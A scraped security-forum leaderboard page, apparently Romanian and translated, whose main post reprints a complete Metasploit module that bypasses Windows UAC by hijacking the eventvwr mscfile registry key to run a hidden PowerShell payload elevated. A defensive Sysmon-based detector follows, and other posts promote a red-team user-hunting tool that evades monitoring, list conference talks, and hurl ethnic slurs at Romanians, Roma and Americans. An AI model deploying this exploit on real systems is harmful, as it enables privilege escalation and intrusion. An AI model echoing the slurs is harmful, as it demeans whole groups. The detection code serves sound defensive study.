Leaderboard
Popular Content
Showing content with the highest reputation on 12/02/16 in all areas
:))))))))) You again? Look, that scumbag ROMANIAN ripped off the Russian. The man sent the RAM sticks and he never paid him. Classic example of a #romulan. Values? #whores, #crooks, #thieves, #manea -> romanian tag cloud
This Metasploit module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  EVENTVWR_DEL_KEY   = "HKCU\\Software\\Classes\\mscfile"
  EVENTVWR_WRITE_KEY = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"
  EXEC_REG_VAL       = '' # This maps to "(Default)"
  EXEC_REG_VAL_TYPE  = 'REG_SZ'
  EVENTVWR_PATH      = "%WINDIR%\\System32\\eventvwr.exe"
  PSH_PATH           = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
  CMD_MAX_LEN        = 2081

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)',
      'Description'    => %q{
        This module will bypass Windows UAC by hijacking a special key in the Registry under
        the current user hive, and inserting a custom command that will get invoked when
        the Windows Event Viewer is launched. It will spawn a second shell that has the UAC
        flag turned off. This module modifies a registry key, but cleans up the key once the
        payload has been invoked.

        The module does not require the architecture of the payload to match the OS. If
        specifying EXE::Custom your DLL should call ExitProcess() after starting your
        payload in a separate process.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matt Nelson',  # UAC bypass discovery and research
        'Matt Graeber', # UAC bypass discovery and research
        'OJ Reeves'     # MSF module
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        => [
        [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
      ],
      'DefaultTarget'  => 0,
      'References'     => [
        [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],
        [ 'URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1' ]
      ],
      'DisclosureDate' => 'Aug 15 2016'
    ))
  end

  def check
    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    commspec = '%COMSPEC%'
    registry_view = REGISTRY_VIEW_NATIVE

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      # On x64, check arch
      if session.arch == ARCH_X86
        # running WOW64, map the correct registry view
        registry_view = REGISTRY_VIEW_64_BIT
        if target_arch.first == ARCH_X64
          # we have an x64 payload specified while using WOW64, so we need to
          # move over to sysnative
          commspec = '%WINDIR%\\Sysnative\\cmd.exe'
        else
          # Else, we're 32-bit payload, so need to ref wow64.
          commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
        end
      elsif target_arch.first == ARCH_X86
        # We're x64, but invoking x86, so switch to SysWOW64
        commspec = '%WINDIR%\\SysWOW64\\cmd.exe'
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
        "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
      )
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path("#{PSH_PATH}")
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
    psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    if existing.empty?
      registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # We can't invoke EventVwr.exe directly because CreateProcess fails with the
    # dreaded 740 error (Program requires elevation). Instead, we must invoke
    # cmd.exe and use that to fire off the binary.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("/c #{EVENTVWR_PATH}")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    Rex::sleep(5)
    handler(client)

    print_status("Cleaning up registry keys ...")
    if existing.empty?
      registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
    else
      registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
      registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view)
    end
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
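From the defender's side, the two observable artifacts of this module are a write to the per-user mscfile open handler and eventvwr.exe spawning a child other than mmc.exe. The detection logic below is an added example, not part of the module or the Metasploit project; it runs over constructed Sysmon-style events (EventID 13 RegistryEvent SetValue and EventID 1 ProcessCreate, field names assumed from Sysmon's schema) and also checks for the "Always Notify" UAC level, which the module itself reports it cannot bypass.

```python
import ntpath
import re

# Writes to the per-user mscfile open handler. Sysmon logs HKCU\Software\Classes
# either as HKU\<SID>\Software\Classes\... or as HKU\<SID>_Classes\..., so match both.
MSCFILE_HANDLER = re.compile(r"(?:\\|_)Classes\\mscfile\\shell\\open\\command\\",
                             re.IGNORECASE)
# eventvwr.exe legitimately hands off to mmc.exe; any other child is unexpected.
EXPECTED_EVENTVWR_CHILDREN = {"mmc.exe"}

# Constructed sample telemetry modelled on Sysmon field names (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Parameters\NtpServer"},
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\updater.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001_Classes\mscfile\shell\open\command\(Default)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\eventvwr.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe"},
]

def is_mscfile_handler_write(ev):
    """Sysmon EventID 13 (RegistryEvent SetValue) touching the mscfile open handler."""
    return ev.get("EventID") == 13 and bool(MSCFILE_HANDLER.search(ev.get("TargetObject", "")))

def is_unexpected_eventvwr_child(ev):
    """Sysmon EventID 1 (ProcessCreate): eventvwr.exe spawning anything but mmc.exe."""
    if ev.get("EventID") != 1:
        return False
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    child = ntpath.basename(ev.get("Image", "")).lower()
    return parent == "eventvwr.exe" and child not in EXPECTED_EVENTVWR_CHILDREN

def scan(events):
    """Return (rule_name, image) for each event that matches either rule."""
    alerts = []
    for ev in events:
        if is_mscfile_handler_write(ev):
            alerts.append(("mscfile_handler_write", ev["Image"]))
        elif is_unexpected_eventvwr_child(ev):
            alerts.append(("eventvwr_unexpected_child", ev["Image"]))
    return alerts

def uac_always_notify(consent_prompt_behavior_admin, prompt_on_secure_desktop):
    """True for the 'Always Notify' level the module reports it cannot bypass:
    ConsentPromptBehaviorAdmin == 2 together with PromptOnSecureDesktop == 1."""
    return consent_prompt_behavior_admin == 2 and prompt_on_secure_desktop == 1

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The benign eventvwr.exe -> mmc.exe creation in the sample is deliberately not flagged, so the rule does not fire every time a user opens Event Viewer.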
Haha. Good thing I can say screw anticard and screw Romania. Haha
Well, I'm not in your country. You can rest easy. And I won't ban you either. I like that you're a first-rate troll :))) Watch out, bans get handed out on your mother's name. ahahaha
Well, I can ban you. No problem, and without discussing it with anyone. I said it so that others don't ban you.
Hi! From what I can see the phone has an MTK processor, so the firmware is flashed with spflashtool, with the phone switched off. You can find firmware on Google, needrom, etc. If it throws any bootloader-related error, try to unlock it (at a repair shop you'll find a box called furios > pack 7 > fly capitan > unlockbootloader, and from there you'll manage).
The country is going to hell with people like these. Might as well go and vote PSD, since it's still crowded enough around here.
That's right, these are the ones who managed to jump the fence and landed on easy street.
hunter
(l)user hunter using WinAPI calls only

Introduction:
During Red Team engagements it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user (no matter how, always "assume compromise") in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he is a local administrator in any box, to which groups he belongs, if he has access to file shares, and so on. Enumerating hosts, users, and groups will also help to get a better understanding of the Domain layout. You might be thinking, "use Powerview". Lately, one of the most common problems I encounter during Red Team exercises is the fact that PowerShell is heavily monitored. If you use it, you'll get caught, sooner or later. By now everyone is well aware how powerful PowerShell is, including Blue Teams and Security Vendors. There are multiple ways to work around this. To avoid using multiple old school tools (psloggedon.exe, netsess.exe, nltest, netview, among others) and to reduce the amount of tools uploaded to compromised systems I created a simple tool that doesn't require Administrative privileges to run and collect the information listed below, and relies only on the Windows API. You might end up dealing with white list bypass and process evasion, but I'll leave that for another day.

Link: https://github.com/fdiskyou/hunter
BSLV16 BSidesLV - 77 videos - 446 views - Last updated on Nov 17, 2016

Opening Keynote Pt. I & II - Lorrie Cranor-FTC, Michael Kaiser-NCSA 36:18
Network Access Control: The Company-Wide Team Building Exercise That Only You Know About - Dean Webb 26:27
Managing Security with the OWASP Assimilation Project - Alan Robertson 40:17
Toward Better Password Requirements - Jim Fenton 56:33
Data Science or Data Pseudo-Science? - Ken Westin 41:51
I Am The Cavalry (IATC) Introduction and Overview - Joshua Corman 23:33
Shall We Play a Game? 30 Years of the CFAA - Leonard Bailey, Jen Ellis 1:28:31
Calling All Hacker Heroes: Go Above And Beyond - Keren Elazari 29:19
Intro to Storage Security, Looking Past the Server - Jarett Kulm 24:47
Are You a PenTexter? - Peter Mosmans, Melanie Rieback 43:41
Deep Adversarial Architectures for Detecting (and Generating) Maliciousness - Hyrum Anderson 39:09
I Am The Cavalry Panel: Progress on Cyber Safety 35:50
Welcome to The World of Yesterday, Tomorrow! - Joel Cardella 46:46
Breaking the Payment Points of Interaction (POI) - Nir Valtman, Patrick Watson 49:06
Cyber Safety And Public Policy - I Am The Cavalry, Amanda Craig, Jen Ellis 55:23
Security Vulnerabilities, the Current State of Consumer Protection Law, & How IOT Might Change It 23:07
How to Get and Maintain your Compliance without ticking everyone off - Rob Carson 23:13
What we've learned with Two-Secret Key Derivation - Jeffrey Goldberg, Julie Haugh 35:32
Exposing the Neutrino EK: All the Naughty Bits - Ryan Chapman 55:08
State Of Healthcare Cyber Safety - Christian Dameff, Colin Morgan, Suzanne Schwartz, Beau Woods 56:46
State Of Automotive Cyber Safety - IATC - Joshua Corman 48:53
DNS Hardening - Proactive Net Sec Using F5 iRules and Open Source Analysis Tools - Jim Nitterauer 25:44
Defeating Machine Learning: Systemic Deficiencies for Detecting Malware 45:14
Beyond the Tip of the IceBerg - Fuzzing Binary Protocol for Deeper Code Coverage 46:23
CFPs 101 - Tottenkoph, Guy McDudefella, Security Moey, David Mortman 47:56
Operation Escalation: How Commodity programs Are Evolving Into Advanced Threats 52:51
Evaluating a password manager - Evan Johnson 31:26
Why does everyone want to kill my passwords? - Mark Burnett 32:11
How to make sure your data science isn't vulnerable to attack - Leila Powell 57:19
DYODE: Do Your Own DiodE for Industrial Control Systems - Ary Kokos, Arnaud Soullie 43:10
Ingress Egress: The emerging threats posed by augmented reality gaming - Andrew Brandt 1:00:45
Ground Truth Keynote: Great Disasters of Machine Learning - Davi Ottenheimer 32:23
IATC Day 2: Introduction and Overview - Joshua Corman, Beau Woods 12:44
Mapping the Human Attack Surface - Louis DiValentin (Master Chen) 26:19
Don't Repeat Yourself: Automating Malware Incident Response for Fun and Profit - Kuba Sendor 29:57
Crafting tailored wordlists with Wordsmith - Sanjiv Kawa, Tom Porter 47:07
Hunting high-value targets in corporate networks - Patrick Fussell, Josh Stone 39:07
A Noobs Intro Into Biohacking, Grinding, DIY Body Augmentation - Doug Copeland 23:19
No Silver Bullet, Multi contextual threat detection via Machine Learning - Rod Soto, Joseph Zadeh 52:34
Stop the Insanity and Improve Humanity: UX for the Win - Robin Burkett 26:10
Powershell-Fu - Hunting on the Endpoint - Chris Gerritz 27:38
Labeling the VirusShare Corpus: Lessons Learned - John Seymour 30:21
There is no security without privacy - Craig Cunningham 30:35
Survey says… Making progress in the Vulnerability Disclosure Debate - Allan Friedman 1:27:38
Domains of Grays - Eric Rand 38:29
Automated Dorking for Fun and Pr^wSalary - Filip Reesalu 13:17
[Private Video]
You Don't See Me - Abusing Whitelists to Hide and Run Malware - Michael Spaling 28:29
Six Degrees of Domain Admin... - Andy Robbins, Will Schroeder, Rohan Vazarkar 51:51
Uncomfortable Approaches - Joshua Corman, Beau Woods 45:37
Latest evasion techniques in fileless malware - fl3uryz & Andrew Hay 26:37
PLC for Home Automation and How It Is as Hackable as a Honeypot - Philippe Lin & Scott Erven 16:22
CyPSA Cyber Physical Situational Awareness - Kate Davis, Edmond Rogers 41:12
Hacking Megatouch Bartop Games - Mark Baseggio 34:54
Passphrases for Humans: A Cultural Approach to Passphrase Wordlist Generation 58:58
Is that a penguin in my Windows? - Spencer McIntyre 39:48
Automation Plumbing - Ashley Holtz & Kyle Maxwell 25:06
Disclosing Passwords Hashing Policies - Michal Spacek 33:12
PAL is your pal: Bootstrapping secrets in Docker - Nick Sullivan 51:00
Dominating the DBIR Data - Anastasia Atanasoff, Gabriel Bassett 56:15
An Evolving Era of Botnet Empires - Andrea Scarfo 28:28
Building an EmPyre with Python - Steve Borosh, Alexander Rymdeko-Harvey, Will Schroeder 50:19
Scalability: Not as Easy as it SIEMs - Keith Kraus & grecs 22:38
Ethical implications of In-Home Robots - Guy McDudefella, Brittany Postnikoff 47:31
The Deal with Password Alternatives - Terry Gold 55:15
QUESTIONING 42: Where is the "engineering" in the Social Engineering of Namespace Compromises? 1:04:23
Cross-platform Compatibility: Bringing InfoSec Skills into the World of Computational Biology 31:27
One Compromise to Rule Them All - Bryce Kunz 53:00
The Future of Bsides - Panel Session 52:46
What's Up Argon2? The Password Hashing Winner A Year Later - JP Aumasson 24:59
Rock Salt: A Method for Securely Storing and Utilizing Password Validation Data 42:58
I Love my BFF (Brute Force Framework) - Kirk Hayes 24:06
Proactive Password Leak Processing - Bruce Marshall
Cruise Line Security Assessment OR Hacking the High Seas - Chad Dewey (Adam Brand) 22:21
Automation of Penetration Testing and the future - Haydn Johnson (Kevin Riggins) 25:20
Pushing Security from the Outside - Kat Sweet, Chris DeWeese 26:19
Why it's all snake oil - and that may be ok - Andrew Morris 46:44

Link: https://www.youtube.com/playlist?list=PLjpIlpOLoRNTG3td7JfV1LDinNFLSHJqM
Agenda
1. Introduction (Jason)
2. Compute Architecture Evolution (Jason)
3. Chip Level Architecture (Jason): subslices, slices, products
4. Gen Compute Architecture (Maiyuran): execution units
5. Instruction Set Architecture (Ken)
6. Memory Sharing Architecture (Jason)
7. Mapping Programming Models to Architecture (Jason)
8. Summary

Download slides: https://software.intel.com/sites/default/files/managed/89/92/Intel-Graphics-Architecture-ISA-and-microarchitecture.pdf
daily quote: Screw America. Quick facts: 1. The people extradited by Romania to the USA have never set foot there, and yet Romania, that wretched country of baboons, extradites anyone without question. 2. If an American commits crimes in Romania (it has happened), nothing happens to anyone. 3. Everyone in Europe (except the Swiss, I think) needs a visa to go to the USA, while any American piece of crap wanders around Europe without a visa. And yes, screw Obama, to hell with that Gypsy.
I appeal to a higher administrator. Who is responsible for the admins? See how he abuses his rights and how he added THIEVES to this topic. You are the first-rate traitor, not me. Here is the proof, click here to see how he calls all of us Romanians thieves: https://rstforums.com/forum/forum/49-discutii-non-it/ And I also saved a screenshot of it so he can't delete it afterwards, so I can expose him.